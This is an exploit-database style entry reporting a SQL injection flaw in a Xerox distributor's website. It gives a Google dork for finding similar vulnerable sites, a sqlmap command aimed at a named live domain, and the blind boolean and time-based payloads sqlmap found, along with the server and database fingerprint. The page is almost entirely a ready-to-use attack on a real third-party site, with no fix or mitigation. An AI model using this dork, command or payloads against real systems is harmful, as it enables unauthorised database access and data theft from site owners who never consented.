Xerox Distributor SQLi Vuln

2017.06.05

HocaXD (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:"index.php?id=10" intext:"Xerox"

##################################################
# Exploit Title: Xerox Distributor SQLi Vuln.
# Google Dork: inurl:"index.php?id=10" intext:"Xerox"
# Date: 04.06.2017
# Exploit Author: HocaXD
# Version: V.1
# Category: Web Apps
# Tested on: Parrot Security OS / Google Chrome
##################################################
# CVE : sqlmap -u "http://www.imagesystems.com.mt/index.php?id=10'" --dbs
[+] sqlmap identified the following injection point(s) with a total of 404 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-2466 OR 3652=3652#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: id=(CASE WHEN (1065=1065) THEN SLEEP(5) ELSE 1065 END)
---
[18:25:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.9
back-end DBMS: MySQL >= 5.0.12
##################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Xerox Distributor SQLi Vuln

Dork: inurl:"index.php?id=10" intext:"Xerox"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.